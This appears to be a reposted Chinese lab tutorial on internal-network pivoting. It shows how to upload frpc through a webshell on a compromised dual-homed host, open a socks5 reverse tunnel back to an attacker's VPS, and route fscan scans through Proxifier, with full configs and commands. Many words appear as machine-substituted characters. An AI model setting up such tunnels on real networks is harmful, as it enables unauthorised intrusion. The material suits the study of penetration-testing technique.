ToB企服应用市场:ToB评测及商务社交产业平台

标题: 内网穿透之frp+proxifier实现socks5反向署理 [打印本页]

作者: 惊落一身雪    时间: 2024-6-30 00:34
标题: 内网穿透之frp+proxifier实现socks5反向署理
目次

前言

内网穿透,署理技术的联系与区别?
我个人感觉在内网渗透的时候它们之间的边界很模糊,其目的都是为了突破内网访问的限制。内网穿透允许将内网的服务袒露给公网,署理服务器充当客户端和目的服务器之间的中介,通过署理服务器来转发网络哀求和响应。
环境搭建

hacker可以访问web服务器win7并且已经获取权限拿到shell,但是win7通过双网卡将内网和外网隔离,以是hacker不可以直接访问内网的Winddows 2008主机。

目的:
frp反向署理

疑问:既然拿到了服务器的shell,为什么不拿服务器的shell直接入侵内网?
我的理解,其一是webshell的功能较少,通常是作为一个上传工具的通道。其二是webshell通常是通过采用http协议传输,没有创建稳定的tcp连接,难以应对内网的渗透时复杂的网络要求。
以是就必要使用一下专业的内网渗透工具来包管内网渗透的过程中始终保持一个较好的网络状态。
frp就是这一个非常实用的工具,frp是一个专注于内网穿透的高性能的反向署理应用,支持TCP、UDP、HTTP、HTTPS等多种协议,且支持P2P通信。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转袒露到公网。
frp项目地址:https://github.com/fatedier/frp
起首分别预备linux平台和windows平台的frp工具(版本必要保持同等):

将liunx平台frp上传至liunx vps搭建frps服务端,必要用到的文件有两个frps服务端程序和frps.ini服务端配置文件,必要重点关注frps.ini文件:

默认只有服务端绑定的端口,可以添加其他配置项目:
  1. [common]
  2. bind_addr = 0.0.0.0  #服务端的ip地址
  3. bind_port = 7000  #服务端的端口号
  4. dashboard_port = 7500  #服务端仪表盘界面的访问端口
  5. dashboard_user = admin  #仪表盘的用户名
  6. dashboard_pwd = 123456  #仪表盘的用户密码
复制代码
生存配置文件,实行./frps -c ./frps.ini命令启动frp服务端,等待客户端连接:

服务搭建成功,接下来将windows平台的frpc通过webshell上传至服务器win7,同样必要配置frpc.ini文件:

配置socks5署理:
  1. [common]
  2. server_addr = ip  #服务器的地址
  3. server_port = 7000  #服务器监听的端口号
  4. tls_enable = ture  #启用tls加密连接
  5. [plugin socks]
  6. type = tcp  #指定协议类型为tcp
  7. plugin = socks5  #使用的插件为socks5
  8. remote_port = 46075  #指定socks5代理的远程端口
  9. use_encryption = true
  10. use_compression = true
复制代码
生存配置文件,实行frpc.exe -c frpc.ini命令启动frp客户端,连接服务端:

通过仪表盘页面也可以看到socks5署理启动成功:

理论上如今就可以访问内网主机了,将浏览器署理改为frp服务器的socks5署理:

访问内网主机192.168.52.143的web服务:

到这里frp的功能就完成了,只有浏览器可以访问这还不敷,下面介绍另一个好用的署理工具。
proxifier署理工具

Proxifier是一个知名的署理工具,它允许用户将网络应用程序通过署理服务器进行连接。它本身只是一个署理管理的工具,可以设置和管理署理连接,但并不提供署理服务器。
下载地址:https://www.proxifier.com/
添加frp署理服务器的ip地址和socks5署理的端口号,协议版本选择为socks5版本:

记得测试一下署理服务是否正常:

默认有两条署理规则, 第一个时体系程序的规则是Direct直连模式,不通过署理。第二个是默认其他应用程序,都通过署理。

试着添加一个新规则,使用当地的fscan扫描内网网段时使用署理(其实默认规则已经包含了):

fscan通过socks署理成功扫描到了192.168.52.0/24网段内的主机:

我还是试了试署理nmap扫描,效果nmap扫描不到,并且proxifier日记也没有显示nmap使用了署理,nmap的tcp扫描也不没有走署理,感觉有点希奇。
如有错误,欢迎指正!o( ̄▽ ̄)ブ

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4